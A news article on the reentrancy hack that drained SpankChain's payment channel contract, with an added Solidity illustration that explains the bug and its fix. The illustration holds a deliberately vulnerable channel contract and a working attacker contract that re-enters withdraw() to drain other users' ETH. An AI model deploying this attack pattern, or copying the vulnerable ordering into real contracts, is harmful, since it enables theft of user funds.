It appears that even the most intimate of blockchain platforms aren't safe from the ever-growing wave of large-scale hacks on the cryptocurrency and blockchain community. Yesterday, adult entertainment blockchain platform SpankChain announced in a blog post that on Saturday evening, while many were no doubt winding down from a challenging workweek, hackers stole 165.38 ETH (~$38,000) from the company's payment channel smart contract. The attack also left an additional ~$4,000 worth of BOOTY immobilized in the contract.
"Of the stolen/immobilized ETH/BOOTY, 34.99 ETH (~$8,000) and 1271.88 BOOTY belongs to users (~$9,300 total), and the rest belonged to SpankChain," reads the company's announcement.
SpankChain reports that it did not realize the hack had taken place until Sunday evening, when the team began investigating unrelated smart contract bugs on the platform. Once the hack was detected, Spank.Live was taken offline to prevent any additional funds from being deposited into the payment channel smart contract.
“Our immediate priority has been to provide complete reimbursements to all users who lost funds,” reads yesterday’s blog post. “We are preparing an ETH airdrop to cover all $9,300 worth of ETH and BOOTY that belonged to users. Funds will be sent directly to users’ SpankPay accounts, and will be available as soon as we reboot Spank.Live.”
The camsite is expected to be down for the next 2-3 days, and possibly longer. SpankChain plans to redeploy the payment channel smart contract with a patch to prevent a repeat of the attack and to update Spank.Live to use the new contract. All user ETH and BOOTY lost in the attack will be returned to SpankPay accounts in the upcoming airdrop, and the SpankChain team is preparing an in-depth investigation into the attack.
According to the announcement,
“By the time we reboot Spank.Live, all viewers and performers will have 100% of the total value in BOOTY+ETH they had in their SpankPay airdropped to their current SpankPay addresses, so users don’t need to do anything.
The site will continue to function exactly as it was before with a single exception — because of the 4,000 BOOTY currently immobilized, we will temporarily reduce the BOOTY limit for each viewer to 10 BOOTY. This means viewers will only be able to tip 10 BOOTY at a time, and upon spending all 10 BOOTY they will automatically recharge their 10 BOOTY with any extra ETH they have deposited, until they completely deplete their ETH balance.”
The attack exploited a reentrancy bug in the SpankChain payment channel contract, the same class of bug that was exploited in the 2016 DAO hack: an external call made before the contract has updated its own state lets the callee call back into the contract and act on stale balances.
“The attacker created a malicious contract masquerading as an ERC20 token, where the ‘transfer’ function called back into the payment channel contract multiple times, draining some ETH each time,” the company reports.
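The following is an added illustration of that attack pattern and its fix, written for this article; it is not SpankChain's payment channel code, and the contract names, function names and storage layout are assumed for the example. A channel contract accepts a user-supplied token address and pays out before zeroing balances; an attacker contract poses as both the channel user and its ERC20 token, and its `transfer` function re-enters `withdraw()` while the ETH balance is still credited. The hardened version fixes the token address at deployment, zeroes balances before any external call (checks-effects-interactions), and adds a reentrancy guard.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Illustrative example only, NOT SpankChain's contract. Names are assumed.

interface IERC20 {
    function transfer(address to, uint256 amount) external returns (bool);
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

contract VulnerableChannel {
    struct Channel { uint256 ethBalance; uint256 tokenBalance; IERC20 token; }
    mapping(address => Channel) public channels;

    // The token address comes from the user, so the contract will later
    // call into arbitrary code while its own funds are at stake.
    function open(IERC20 token) external payable {
        Channel storage c = channels[msg.sender];
        c.token = token;
        c.ethBalance += msg.value;
    }

    // A fake token returns true without moving anything, so the channel
    // credits a token balance that was never deposited.
    function depositToken(uint256 amount) external {
        Channel storage c = channels[msg.sender];
        require(c.token.transferFrom(msg.sender, address(this), amount), "transferFrom failed");
        c.tokenBalance += amount;
    }

    // BUG: balances are zeroed only AFTER the external calls. The ETH send uses
    // transfer() (2300 gas stipend, no re-entry), but token.transfer() gets full
    // gas and can call withdraw() again while ethBalance is still unchanged.
    function withdraw() external {
        Channel storage c = channels[msg.sender];
        uint256 ethOut = c.ethBalance;
        uint256 tokOut = c.tokenBalance;
        payable(msg.sender).transfer(ethOut);
        if (tokOut > 0) require(c.token.transfer(msg.sender, tokOut), "transfer failed");
        c.ethBalance = 0;      // too late: the call above already re-entered
        c.tokenBalance = 0;
    }
}

// Attacker: the same contract is the channel's "user" and its "ERC20 token".
contract MaliciousToken {
    VulnerableChannel public immutable channel;
    uint256 public rounds;

    constructor(VulnerableChannel _channel) { channel = _channel; }

    function transferFrom(address, address, uint256) external pure returns (bool) { return true; }

    // Invoked by VulnerableChannel.withdraw() before balances are zeroed:
    // re-enter until the channel is drained or a depth limit is reached.
    function transfer(address, uint256) external returns (bool) {
        (uint256 eth, , ) = channel.channels(address(this));
        if (rounds < 10 && address(channel).balance >= eth) {
            rounds++;
            channel.withdraw();
        }
        return true;
    }

    // Deposit X ETH, claim a fake token balance, then withdraw: every nested
    // call pays out X ETH again, taking other users' deposits with it.
    function attack() external payable {
        channel.open{value: msg.value}(IERC20(address(this)));
        channel.depositToken(1);
        channel.withdraw();
    }

    receive() external payable {}
}

contract HardenedChannel {
    struct Channel { uint256 ethBalance; uint256 tokenBalance; }
    IERC20 public immutable token;   // fixed at deployment, never user-supplied
    mapping(address => Channel) public channels;
    uint256 private lock = 1;

    modifier nonReentrant() {
        require(lock == 1, "reentrant call");
        lock = 2;
        _;
        lock = 1;
    }

    constructor(IERC20 _token) { token = _token; }

    function open() external payable { channels[msg.sender].ethBalance += msg.value; }

    function depositToken(uint256 amount) external nonReentrant {
        require(token.transferFrom(msg.sender, address(this), amount), "transferFrom failed");
        channels[msg.sender].tokenBalance += amount;
    }

    // Checks-effects-interactions: zero balances BEFORE any external call; the
    // guard additionally rejects re-entry if the ordering is ever broken again.
    function withdraw() external nonReentrant {
        Channel storage c = channels[msg.sender];
        uint256 ethOut = c.ethBalance;
        uint256 tokOut = c.tokenBalance;
        c.ethBalance = 0;
        c.tokenBalance = 0;
        if (tokOut > 0) require(token.transfer(msg.sender, tokOut), "transfer failed");
        (bool ok, ) = payable(msg.sender).call{value: ethOut}("");
        require(ok, "ETH send failed");
    }
}
```

Two points worth checking in any channel or escrow contract after reading this: first, whether any address the contract calls can be chosen by an untrusted party (the token here), since every such call is a potential re-entry point; second, whether state is committed before or after that call. The 2300-gas stipend of `transfer()` is not a defense on its own, as opcode gas costs change across hard forks, which is why the fix relies on ordering plus an explicit guard rather than on limiting gas.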
SpankChain has openly stated that earlier this year it decided to pass on a security audit by Zeppelin of one of its previous unidirectional payment channel contracts. The audit would have cost $17,000, and at the time the contract held less than that amount.
In the wake of this weekend's attack, Zeppelin has quoted $30,000-$50,000 for an audit of a separate and more sophisticated non-custodial SpankChain payment channel contract, which SpankChain has accepted.
“As we move forward and grow, we will be stepping up our security practices, and making sure to get multiple internal audits for any smart contract code we publish, as well as at least one professional external audit,” SpankChain stated.